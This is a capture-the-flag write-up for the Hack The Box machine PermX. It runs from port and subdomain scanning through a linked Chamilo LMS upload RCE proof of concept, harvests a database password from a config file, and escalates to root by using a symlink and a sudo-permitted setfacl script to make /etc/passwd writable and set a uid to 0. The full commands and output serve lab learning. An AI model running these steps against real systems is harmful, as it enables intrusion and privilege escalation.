PermX
https://app.hackthebox.com/machines/PermX
Port scanning
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: eLEARNING
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 secondsSubdomain scanning
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://permx.htb
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 18
________________________________________________
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 145ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 227ms]
:: Progress: [4989/4989] :: Job [1/1] :: 280 req/sec :: Duration: [0:00:21] :: Errors: 0 ::Web vuln
We see it's using Chamilo LMS, basic googling about it's recent vuln gives POC
https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc POC LINK
Shell
www-data
Follow the POC steps and get a reverse shell.
www-data -> mtz
cd /var/www/chamilo && grep -irl "password"This will list all files that contains password variable/text.
We will find cli-config.php where we see all imp variables,
<?php
/* For licensing terms, see /license.txt */
/**
* Script needed to execute bin/doctrine.php in the command line
* in order to:.
*
* - Generate migrations
* - Create schema
* - Update schema
* - Validate schema
* - Etc
*/
use Doctrine\ORM\Tools\Console\ConsoleRunner;
require_once __DIR__.'/vendor/autoload.php';
//require_once __DIR__.'/main/inc/lib/api.lib.php';
$configurationFile = __DIR__.'/app/config/configuration.php';
if (!is_file($configurationFile)) {
echo "File does not exists: $configurationFile";
exit();
}
require_once __DIR__.'/main/inc/global.inc.php';
require_once $configurationFile;
$database = new \Database();
$dbParams = [
'driver' => 'pdo_mysql',
'host' => $_configuration['db_host'],
'user' => $_configuration['db_user'],
'password' => $_configuration['db_password'],
'dbname' => $_configuration['main_database'],
];
$database->connect($dbParams, realpath(__DIR__).'/', realpath(__DIR__).'/');
$entityManager = $database::getManager();
$helperSet = ConsoleRunner::createHelperSet($entityManager);
$dialogHelper = new Symfony\Component\Console\Helper\QuestionHelper();
$helperSet->set($dialogHelper);
return $helperSet;out of which I found this useful
$configurationFile = __DIR__.'/app/config/configuration.php';configuration.php
www-data@permx:/var/www/chamilo$ cat ./app/config/configuration.php | grep password
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Security word for password recovery
<--SNIPPED-->Now we can ssh and be user mtz
Ohh btw, how I find user mtz??? Here's how โฌ๏ธ
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
mtz:x:1000:1000:mtz:/home/mtz:/bin/bashmtz -> root
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.shFile content:
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"What is setfacl?
To sum it up, it's alternative of chmod with more extra features.
Exploit
How's the script working:
It checks if given file is under /home/mtz (so a normal user should not change other imp files)
The argument should not have
..(it should stay under /home/mtz)The given argument should be file
With given 3 rules, it's very easy to bypass this. We wil create a symbolic link, under /home/mtz, so that we can edit different sources files too
#created link
mtz@permx:~$ ln -s /etc/passwd /home/mtz/passwd
#modified permission
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/passwd
mtz@permx:~$ ls -la /etc/passwd
-rw-rwxr--+ 1 root root 1874 Jul 13 10:48 /etc/passwd
mtz@permx:~$ ls -la passwd
lrwxrwxrwx 1 mtz mtz 11 Jul 13 10:45 passwd -> /etc/passwd
Now let's become root, i'll simply update my uid from 1000 to 0
mtz@permx:~$ cat passwd
root:x:0:0:root:/root:/bin/bash
<--SNIPPED-->
mtz:x:0:0:mtz:/home/mtz:/bin/bash #<- here we changed our permission
<--SNIPPED->
#Now just login as mtz, and boom we are root
#You can also create new user and make that user root(uid 0).
mtz@permx:~$ su mtz
Password:
root@permx:~# id
uid=0(root) gid=0(root) groups=0(root),1000(mtz)
_____________heapbytes's still pwning....
Last updated